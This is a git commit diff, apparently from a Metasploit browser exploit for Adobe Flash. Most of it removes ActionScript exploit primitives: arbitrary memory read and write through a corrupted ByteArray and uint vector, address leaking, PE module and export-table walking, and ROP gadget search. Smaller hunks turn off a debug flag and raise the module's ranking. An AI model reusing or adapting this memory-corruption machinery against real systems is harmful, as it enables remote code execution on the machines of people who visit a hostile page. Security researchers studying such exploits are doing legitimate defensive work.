Make last code cleanup
parent
d9db45690f
commit
e5d6c9a3cb
Binary file not shown.
|
@ -277,144 +277,5 @@ package
|
|||
}
|
||||
return 0xffffffff
|
||||
}
|
||||
|
||||
// Use the corrupted shared_ba to disclose its own address
|
||||
private function search_ba_address():uint {
|
||||
var address:uint = 0
|
||||
this.shared_ba.position = 0x14
|
||||
address = shared_ba.readUnsignedInt()
|
||||
if (address == 0) {
|
||||
address = 0xffffffff
|
||||
this.shared_ba.position = 8
|
||||
var next:uint = shared_ba.readUnsignedInt()
|
||||
var prior:uint = shared_ba.readUnsignedInt()
|
||||
if (next - prior == 0x8000) {
|
||||
address = prior + 0x4000
|
||||
}
|
||||
} else {
|
||||
address = address - 0x30
|
||||
}
|
||||
|
||||
return address
|
||||
}
|
||||
|
||||
// Use the corrupted uint vector to search an vector with
|
||||
// interesting objects for info leaking
|
||||
private function search_object_vector():uint {
|
||||
var i:uint = 0;
|
||||
while (i < 0x4000){
|
||||
if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
|
||||
return i + 1;
|
||||
}
|
||||
i++
|
||||
}
|
||||
return 0xffffffff
|
||||
}
|
||||
|
||||
// Methods to use the corrupted uint vector
|
||||
|
||||
private function vector_write(addr:uint, value:uint = 0):void
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > this.uv[0]) {
|
||||
pos = ((addr - this.uv[0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
this.uv[pos] = value
|
||||
}
|
||||
|
||||
private function vector_read(addr:uint):uint
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > this.uv[0]) {
|
||||
pos = ((addr - this.uv[0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
return this.uv[pos]
|
||||
}
|
||||
|
||||
// Methods to use the corrupted byte array for arbitrary reading/writing
|
||||
|
||||
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
|
||||
{
|
||||
if (addr) ba.position = addr
|
||||
if (value is String) {
|
||||
for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
|
||||
if (zero) ba.writeByte(0)
|
||||
} else ba.writeUnsignedInt(value)
|
||||
}
|
||||
|
||||
private function byte_read(addr:uint, type:String = "dword"):uint
|
||||
{
|
||||
ba.position = addr
|
||||
switch(type) {
|
||||
case "dword":
|
||||
return ba.readUnsignedInt()
|
||||
case "word":
|
||||
return ba.readUnsignedShort()
|
||||
case "byte":
|
||||
return ba.readUnsignedByte()
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
// Methods to search the memory with the corrupted byte array
|
||||
|
||||
private function base(addr:uint):uint
|
||||
{
|
||||
addr &= 0xffff0000
|
||||
while (true) {
|
||||
if (byte_read(addr) == 0x00905a4d) return addr
|
||||
addr -= 0x10000
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
private function module(name:String, addr:uint):uint
|
||||
{
|
||||
var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80)
|
||||
var i:int = -1
|
||||
while (true) {
|
||||
var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
|
||||
if (!entry) throw new Error("FAIL!");
|
||||
ba.position = addr + entry
|
||||
var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
|
||||
if (dll_name == name.toUpperCase()) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
|
||||
}
|
||||
|
||||
private function procedure(name:String, addr:uint):uint
|
||||
{
|
||||
var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
|
||||
var numberOfNames:uint = byte_read(eat + 0x18)
|
||||
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
|
||||
var addressOfNames:uint = addr + byte_read(eat + 0x20)
|
||||
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
|
||||
|
||||
for (var i:uint = 0; ; i++) {
|
||||
var entry:uint = byte_read(addressOfNames + i * 4)
|
||||
ba.position = addr + entry
|
||||
if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
|
||||
}
|
||||
return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
|
||||
}
|
||||
|
||||
private function gadget(gadget:String, hint:uint, addr:uint):uint
|
||||
{
|
||||
var find:uint = 0
|
||||
var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
|
||||
var value:uint = parseInt(gadget, 16)
|
||||
for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
|
||||
return addr + i
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -3,7 +3,7 @@ package
|
|||
import flash.external.ExternalInterface
|
||||
|
||||
public class Logger {
|
||||
private static const DEBUG:uint = 1
|
||||
private static const DEBUG:uint = 0
|
||||
|
||||
public static function alert(msg:String):void
|
||||
{
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
|
|
Loading…
Reference in New Issue